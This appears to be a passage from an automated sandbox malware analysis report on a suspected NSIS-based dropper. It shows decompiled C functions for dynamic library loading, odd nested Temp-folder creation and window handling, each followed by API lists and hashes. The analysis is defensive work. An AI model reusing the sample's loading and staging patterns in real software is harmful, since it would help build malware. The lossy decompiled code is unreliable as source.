                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                                                            • String ID: !
                                                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                                                            • Opcode ID: 42ac717b5df7d2cec433c0636a0426ea096ef7e280fb5d2d86a20e037e064bd8
                                                                                                                                                                            • Instruction ID: 8c5f373ebb4f04a7667d2ac223661d72b1d1710abc4319b228b7a024b5145321
                                                                                                                                                                            • Opcode Fuzzy Hash: 42ac717b5df7d2cec433c0636a0426ea096ef7e280fb5d2d86a20e037e064bd8
                                                                                                                                                                            • Instruction Fuzzy Hash: 50216271A44108BFEF129FB0C94AAAD7B75DB44308F14807EF541B61D1D6B886419B29
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                            			E00405859(void* __eflags, intOrPtr _a4) {
                                                                                                                                                                            				int _t11;
                                                                                                                                                                            				signed char* _t12;
                                                                                                                                                                            				long _t16;
                                                                                                                                                                            				intOrPtr _t18;
                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                            				void* _t22;
                                                                                                                                                                            
                                                                                                                                                                            				E00405CF9(0x421110, _a4);
                                                                                                                                                                            				_t21 = E00405804(0x421110);
                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                            					E00405F64(_t21);
                                                                                                                                                                            					if(( *0x423718 & 0x00000080) == 0) {
                                                                                                                                                                            						L5:
                                                                                                                                                                            						_t22 = _t21 - 0x421110;
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							_t11 = lstrlenA(0x421110);
                                                                                                                                                                            							_push(0x421110);
                                                                                                                                                                            							if(_t11 <= _t22) {
                                                                                                                                                                            								break;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t12 = E00405FFD();
                                                                                                                                                                            							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                                                                                                            								E004057B2(0x421110);
                                                                                                                                                                            								continue;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								goto L1;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						E0040576B();
                                                                                                                                                                            						_t16 = GetFileAttributesA(??); // executed
                                                                                                                                                                            						return 0 | _t16 != 0xffffffff;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t18 =  *_t21;
                                                                                                                                                                            					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                                                                                                            						goto L1;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						goto L5;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				L1:
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}









                                                                                                                                                                            0x00405865
                                                                                                                                                                            0x00405870
                                                                                                                                                                            0x00405874
                                                                                                                                                                            0x0040587b
                                                                                                                                                                            0x00405887
                                                                                                                                                                            0x00405893
                                                                                                                                                                            0x00405893
                                                                                                                                                                            0x004058ab
                                                                                                                                                                            0x004058ac
                                                                                                                                                                            0x004058b3
                                                                                                                                                                            0x004058b4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405897
                                                                                                                                                                            0x0040589e
                                                                                                                                                                            0x004058a6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040589e
                                                                                                                                                                            0x004058b6
                                                                                                                                                                            0x004058bc
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004058ca
                                                                                                                                                                            0x00405889
                                                                                                                                                                            0x0040588d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040588d
                                                                                                                                                                            0x00405876
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00405CF9: lstrcpynA.KERNEL32(?,?,00000400,00403187,00422F00,NSIS Error), ref: 00405D06
                                                                                                                                                                              • Part of subcall function 00405804: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,?,00405870,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,76803410,?,C:\Users\user\AppData\Local\Temp\,004055BB,?,76803410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405812
                                                                                                                                                                              • Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 00405817
                                                                                                                                                                              • Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 0040582B
                                                                                                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl1543.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,76803410,?,C:\Users\user\AppData\Local\Temp\,004055BB,?,76803410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058AC
                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsl1543.tmp,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,76803410,?,C:\Users\user\AppData\Local\Temp\,004055BB,?,76803410,C:\Users\user\AppData\Local\Temp\), ref: 004058BC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsl1543.tmp
                                                                                                                                                                            • API String ID: 3248276644-826843924
                                                                                                                                                                            • Opcode ID: 2f5f7bd10b83e5c994280ddce28bb3e0edcf250d71028fabecdb2709bf5dd46b
                                                                                                                                                                            • Instruction ID: 1d2993da53655c0900dfa7f8eb6ffa86a16769ab8224128061af08a25d69d353
                                                                                                                                                                            • Opcode Fuzzy Hash: 2f5f7bd10b83e5c994280ddce28bb3e0edcf250d71028fabecdb2709bf5dd46b
                                                                                                                                                                            • Instruction Fuzzy Hash: 16F0F427105E5165DA22323B1C05B9F1A44CD86354718C53BFC51F22D2DA3CC8629DBE
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                            			E00401F90(void* __ebx, void* __eflags) {
                                                                                                                                                                            				struct HINSTANCE__* _t18;
                                                                                                                                                                            				struct HINSTANCE__* _t26;
                                                                                                                                                                            				void* _t27;
                                                                                                                                                                            				struct HINSTANCE__* _t30;
                                                                                                                                                                            				CHAR* _t32;
                                                                                                                                                                            				intOrPtr* _t33;
                                                                                                                                                                            				void* _t34;
                                                                                                                                                                            
                                                                                                                                                                            				_t27 = __ebx;
                                                                                                                                                                            				asm("sbb eax, 0x4237b8");
                                                                                                                                                                            				 *(_t34 - 4) = 1;
                                                                                                                                                                            				if(__eflags < 0) {
                                                                                                                                                                            					_push(0xffffffe7);
                                                                                                                                                                            					L15:
                                                                                                                                                                            					E00401423();
                                                                                                                                                                            					L16:
                                                                                                                                                                            					 *0x423788 =  *0x423788 +  *(_t34 - 4);
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t32 = E00402A3A(0xfffffff0);
                                                                                                                                                                            				 *(_t34 + 8) = E00402A3A(1);
                                                                                                                                                                            				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                                                                                                                                            					L3:
                                                                                                                                                                            					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                                                                                                                                            					_t30 = _t18;
                                                                                                                                                                            					if(_t30 == _t27) {
                                                                                                                                                                            						_push(0xfffffff6);
                                                                                                                                                                            						goto L15;
                                                                                                                                                                            					}
                                                                                                                                                                            					L4:
                                                                                                                                                                            					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                                                                                                                                            					if(_t33 == _t27) {
                                                                                                                                                                            						E00404F12(0xfffffff7,  *(_t34 + 8));
                                                                                                                                                                            					} else {
                                                                                                                                                                            						 *(_t34 - 4) = _t27;
                                                                                                                                                                            						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                                                                                                                                            							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x424000, 0x40a7ec, 0x409000); // executed
                                                                                                                                                                            						} else {
                                                                                                                                                                            							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                                                                                                                                            							if( *_t33() != 0) {
                                                                                                                                                                            								 *(_t34 - 4) = 1;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403619(_t30) != 0) {
                                                                                                                                                                            						FreeLibrary(_t30);
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L16;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t26 = GetModuleHandleA(_t32); // executed
                                                                                                                                                                            				_t30 = _t26;
                                                                                                                                                                            				if(_t30 != __ebx) {
                                                                                                                                                                            					goto L4;
                                                                                                                                                                            				}
                                                                                                                                                                            				goto L3;
                                                                                                                                                                            			}










                                                                                                                                                                            0x00401f90
                                                                                                                                                                            0x00401f90
                                                                                                                                                                            0x00401f95
                                                                                                                                                                            0x00401f9c
                                                                                                                                                                            0x00402057
                                                                                                                                                                            0x004021c4
                                                                                                                                                                            0x004021c4
                                                                                                                                                                            0x004028cf
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x004028de
                                                                                                                                                                            0x004028de
                                                                                                                                                                            0x00401fab
                                                                                                                                                                            0x00401fb5
                                                                                                                                                                            0x00401fb8
                                                                                                                                                                            0x00401fc7
                                                                                                                                                                            0x00401fcb
                                                                                                                                                                            0x00401fd1
                                                                                                                                                                            0x00401fd5
                                                                                                                                                                            0x00402050
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402050
                                                                                                                                                                            0x00401fd7
                                                                                                                                                                            0x00401fe0
                                                                                                                                                                            0x00401fe4
                                                                                                                                                                            0x00402028
                                                                                                                                                                            0x00401fe6
                                                                                                                                                                            0x00401fe9
                                                                                                                                                                            0x00401fec
                                                                                                                                                                            0x0040201c
                                                                                                                                                                            0x00401fee
                                                                                                                                                                            0x00401ff1
                                                                                                                                                                            0x00401ffa
                                                                                                                                                                            0x00401ffc
                                                                                                                                                                            0x00401ffc
                                                                                                                                                                            0x00401ffa
                                                                                                                                                                            0x00401fec
                                                                                                                                                                            0x00402030
                                                                                                                                                                            0x00402045
                                                                                                                                                                            0x00402045
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402030
                                                                                                                                                                            0x00401fbb
                                                                                                                                                                            0x00401fc1
                                                                                                                                                                            0x00401fc5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB
                                                                                                                                                                              • Part of subcall function 00404F12: lstrlenA.KERNEL32(0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
                                                                                                                                                                              • Part of subcall function 00404F12: lstrlenA.KERNEL32(00402FCF,0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
                                                                                                                                                                              • Part of subcall function 00404F12: lstrcatA.KERNEL32(0041F4E8,00402FCF,00402FCF,0041F4E8,00000000,0040E8C0,00000000), ref: 00404F6E
                                                                                                                                                                              • Part of subcall function 00404F12: SetWindowTextA.USER32(0041F4E8,0041F4E8), ref: 00404F80
                                                                                                                                                                              • Part of subcall function 00404F12: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FA6
                                                                                                                                                                              • Part of subcall function 00404F12: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC0
                                                                                                                                                                              • Part of subcall function 00404F12: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FCE
                                                                                                                                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2987980305-0
                                                                                                                                                                            • Opcode ID: 16b403b5e5009e1bd150d7402655e3879776899e8f583e554ec1c22846a11af5
                                                                                                                                                                            • Instruction ID: 033e4e5f5e4c037d50d2464c5542d6b5672e4837e9f8cb01fb8d89ff16108e1c
                                                                                                                                                                            • Opcode Fuzzy Hash: 16b403b5e5009e1bd150d7402655e3879776899e8f583e554ec1c22846a11af5
                                                                                                                                                                            • Instruction Fuzzy Hash: 1A212B72904211FBDF217FA48E49AAE76B1AB45318F30423BF701B62D0C7BD49459A6E
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                            			E004015B3(char __ebx) {
                                                                                                                                                                            				void* _t13;
                                                                                                                                                                            				int _t19;
                                                                                                                                                                            				char _t21;
                                                                                                                                                                            				void* _t22;
                                                                                                                                                                            				char _t23;
                                                                                                                                                                            				signed char _t24;
                                                                                                                                                                            				char _t26;
                                                                                                                                                                            				CHAR* _t28;
                                                                                                                                                                            				char* _t32;
                                                                                                                                                                            				void* _t33;
                                                                                                                                                                            
                                                                                                                                                                            				_t26 = __ebx;
                                                                                                                                                                            				_t28 = E00402A3A(0xfffffff0);
                                                                                                                                                                            				_t13 = E00405804(_t28);
                                                                                                                                                                            				_t30 = _t13;
                                                                                                                                                                            				if(_t13 != __ebx) {
                                                                                                                                                                            					do {
                                                                                                                                                                            						_t32 = E00405796(_t30, 0x5c);
                                                                                                                                                                            						_t21 =  *_t32;
                                                                                                                                                                            						 *_t32 = _t26;
                                                                                                                                                                            						 *((char*)(_t33 + 0xb)) = _t21;
                                                                                                                                                                            						if(_t21 != _t26) {
                                                                                                                                                                            							L5:
                                                                                                                                                                            							_t22 = E00405455(_t28);
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t38 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                                                                                                                                            							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E00405472(_t38) == 0) {
                                                                                                                                                                            								goto L5;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t22 = E004053D8(_t28); // executed
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t22 != _t26) {
                                                                                                                                                                            							if(_t22 != 0xb7) {
                                                                                                                                                                            								L9:
                                                                                                                                                                            								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t24 = GetFileAttributesA(_t28); // executed
                                                                                                                                                                            								if((_t24 & 0x00000010) == 0) {
                                                                                                                                                                            									goto L9;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                                                                                                                                            						 *_t32 = _t23;
                                                                                                                                                                            						_t30 = _t32 + 1;
                                                                                                                                                                            					} while (_t23 != _t26);
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                                                                                                                                            					_push(0xfffffff5);
                                                                                                                                                                            					E00401423();
                                                                                                                                                                            				} else {
                                                                                                                                                                            					E00401423(0xffffffe6);
                                                                                                                                                                            					E00405CF9("C:\\Users\\Arthur\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical\\Micala\\aarhundredeskiftet\\Dichroitic30\\Climaxed", _t28);
                                                                                                                                                                            					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                                                                                                                                            					if(_t19 == 0) {
                                                                                                                                                                            						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t33 - 4));
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}













                                                                                                                                                                            0x004015b3
                                                                                                                                                                            0x004015ba
                                                                                                                                                                            0x004015bd
                                                                                                                                                                            0x004015c2
                                                                                                                                                                            0x004015c6
                                                                                                                                                                            0x004015c8
                                                                                                                                                                            0x004015d0
                                                                                                                                                                            0x004015d2
                                                                                                                                                                            0x004015d4
                                                                                                                                                                            0x004015d8
                                                                                                                                                                            0x004015db
                                                                                                                                                                            0x004015f3
                                                                                                                                                                            0x004015f4
                                                                                                                                                                            0x004015dd
                                                                                                                                                                            0x004015dd
                                                                                                                                                                            0x004015e0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004015eb
                                                                                                                                                                            0x004015ec
                                                                                                                                                                            0x004015ec
                                                                                                                                                                            0x004015e0
                                                                                                                                                                            0x004015fb
                                                                                                                                                                            0x00401602
                                                                                                                                                                            0x0040160f
                                                                                                                                                                            0x0040160f
                                                                                                                                                                            0x00401604
                                                                                                                                                                            0x00401605
                                                                                                                                                                            0x0040160d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0040160d
                                                                                                                                                                            0x00401602
                                                                                                                                                                            0x00401612
                                                                                                                                                                            0x00401615
                                                                                                                                                                            0x00401617
                                                                                                                                                                            0x00401618
                                                                                                                                                                            0x004015c8
                                                                                                                                                                            0x0040161f
                                                                                                                                                                            0x0040164a
                                                                                                                                                                            0x004021c4
                                                                                                                                                                            0x00401621
                                                                                                                                                                            0x00401623
                                                                                                                                                                            0x0040162e
                                                                                                                                                                            0x00401634
                                                                                                                                                                            0x0040163c
                                                                                                                                                                            0x00401642
                                                                                                                                                                            0x00401642
                                                                                                                                                                            0x0040163c
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x004028de

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00405804: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,?,00405870,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,C:\Users\user\AppData\Local\Temp\nsl1543.tmp,76803410,?,C:\Users\user\AppData\Local\Temp\,004055BB,?,76803410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405812
                                                                                                                                                                              • Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 00405817
                                                                                                                                                                              • Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 0040582B
                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                                                                                              • Part of subcall function 004053D8: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040541B
                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Micala\aarhundredeskiftet\Dichroitic30\Climaxed,00000000,00000000,000000F0), ref: 00401634
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Micala\aarhundredeskiftet\Dichroitic30\Climaxed, xrefs: 00401629
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Micala\aarhundredeskiftet\Dichroitic30\Climaxed
                                                                                                                                                                            • API String ID: 1892508949-3529700753
                                                                                                                                                                            • Opcode ID: 35b5ce37ea2c102454e257f7c2ebfae98d79ea08dc301c245ac192245ac20f33
                                                                                                                                                                            • Instruction ID: 4fb2b9239308f527e4829455642bf5c86be9504270dcf99fcce102751257b2ff
                                                                                                                                                                            • Opcode Fuzzy Hash: 35b5ce37ea2c102454e257f7c2ebfae98d79ea08dc301c245ac192245ac20f33
                                                                                                                                                                            • Instruction Fuzzy Hash: 1611E736508141ABEF217F650D415BF27B0EA92325738467FE592B62E2C63C4942A63F
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                            			E00404E86(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                                                                            				long _t9;
                                                                                                                                                                            				int _t15;
                                                                                                                                                                            				long _t16;
                                                                                                                                                                            
                                                                                                                                                                            				_t15 = _a8;
                                                                                                                                                                            				if(_t15 != 0x102) {
                                                                                                                                                                            					if(_t15 != 0x200) {
                                                                                                                                                                            						_t16 = _a16;
                                                                                                                                                                            						L7:
                                                                                                                                                                            						if(_t15 == 0x419 &&  *0x41fcf4 != _t16) {
                                                                                                                                                                            							_push(_t16);
                                                                                                                                                                            							_push(6);
                                                                                                                                                                            							 *0x41fcf4 = _t16;
                                                                                                                                                                            							E0040485D();
                                                                                                                                                                            						}
                                                                                                                                                                            						L11:
                                                                                                                                                                            						_t9 = CallWindowProcA( *0x41fcfc, _a4, _t15, _a12, _t16); // executed
                                                                                                                                                                            						return _t9;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(IsWindowVisible(_a4) == 0) {
                                                                                                                                                                            						L10:
                                                                                                                                                                            						_t16 = _a16;
                                                                                                                                                                            						goto L11;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t16 = E004047DD(_a4, 1);
                                                                                                                                                                            					_t15 = 0x419;
                                                                                                                                                                            					goto L7;
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_a12 != 0x20) {
                                                                                                                                                                            					goto L10;
                                                                                                                                                                            				}
                                                                                                                                                                            				E00403F2A(0x413);
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}






                                                                                                                                                                            0x00404e8a
                                                                                                                                                                            0x00404e94
                                                                                                                                                                            0x00404eb0
                                                                                                                                                                            0x00404ed2
                                                                                                                                                                            0x00404ed5
                                                                                                                                                                            0x00404edb
                                                                                                                                                                            0x00404ee5
                                                                                                                                                                            0x00404ee6
                                                                                                                                                                            0x00404ee8
                                                                                                                                                                            0x00404eee
                                                                                                                                                                            0x00404eee
                                                                                                                                                                            0x00404ef8
                                                                                                                                                                            0x00404f06
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404f06
                                                                                                                                                                            0x00404ebd
                                                                                                                                                                            0x00404ef5
                                                                                                                                                                            0x00404ef5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404ef5
                                                                                                                                                                            0x00404ec9
                                                                                                                                                                            0x00404ecb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404ecb
                                                                                                                                                                            0x00404e9a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00404ea1
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 00404EB5
